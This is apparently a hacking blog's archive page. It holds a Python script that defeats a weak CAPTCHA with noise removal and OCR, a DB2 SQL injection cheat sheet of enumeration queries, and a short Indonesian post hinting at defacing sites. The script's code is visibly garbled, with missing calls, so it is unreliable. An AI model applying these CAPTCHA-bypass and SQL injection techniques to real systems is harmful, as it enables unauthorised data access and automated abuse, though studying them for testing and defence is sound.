Archive for the ‘Security’ Category

Breaking Weak CAPTCHA in 26 Lines of Code

July 10, 2010 Leave a comment

During one of our latest engagements we found a weak CAPTCHA implementation being used in the target Web application. The assessment was being performed on-site, and after identifying this vulnerability we started to talk with the CSO about how easy it would be to break it.


The general consensus of course was “very easy”. The problem was that we were unable to find any good CAPTCHA breaking software that average joe could download and run on his computer; so I spent some minutes creating a simple Python script that returns the CAPTCHA solution for this particular implementation.

Before we dig into the script, lets analyze why this CAPTCHA is weak (might not be obvious for some readers):

  1. The letters are not rotated
  2. All letters have the same height
  3. All letters have the exact same color
  4. The letters are not deformed in any way
  5. The background noise color is the same for the whole image

Now, lets see the code that breaks this CAPTCHA:

from PIL import Image

img ='input.gif')
img = img.convert("RGBA")

pixdata = img.load()

# Clean the background noise, if color != black, then set to white.
for y in xrange(img.size[1]):
for x in xrange(img.size[0]):
if pixdata[x, y] != (0, 0, 0, 255):
pixdata[x, y] = (255, 255, 255, 255)"input-black.gif", "GIF")

#   Make the image bigger (needed for OCR)
im_orig ='input-black.gif')
big = im_orig.resize((116, 56), Image.NEAREST)

ext = ".tif""input-NEAREST" + ext)

#   Perform OCR using pytesser library
from pytesser import *
image ='input-NEAREST.tif')
print image_to_string(image)

This simple script works with ~ 90% of the CAPTCHA images created using this specific implementation. Enjoy!

Categories: Security, Underground

DB2 SQL Injection Cheat Sheet

July 10, 2010 Leave a comment

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience.  When you do find one, though it pays to be prepared…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection.  All tests were performed on DB2 8.2 under Windows.

This post is part of series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

Version select versionnumber, version_timestamp from sysibm.sysversions;
Comments select blah from foo; — comment like this
Current User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges select * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
List DBA Accounts TODO
Current Database select current server from sysibm.sysdummy1;
List Databases SELECT schemaname FROM syscat.schemata;
List Columns select name, tbname, coltype from sysibm.syscolumns;
List Tables select name from sysibm.systables;
Find Tables From Column Name TODO
Select Nth Row select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1;  — returns b
Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char select chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Value select ascii(‘A’) from sysibm.sysdummy1; — returns 65
Casting SELECT cast(‘123’ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ???See Heavy Queries article for some ideas.
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address TODO
Location of DB files TODO
Default/System Databases TODO

This page will probably remain a work-in-progress for some time yet.  I’ll update it as I learn more.

Categories: Hacking, Security, Underground


July 6, 2010 Leave a comment

sumpah lagi males ngerjain kerjaan,, mending ngacak-ngacak rumah orang.. lalala